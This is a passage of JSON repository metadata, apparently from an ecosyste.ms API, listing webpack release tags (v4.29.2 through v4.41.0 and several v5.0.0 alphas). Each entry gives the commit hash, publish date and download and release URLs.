.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed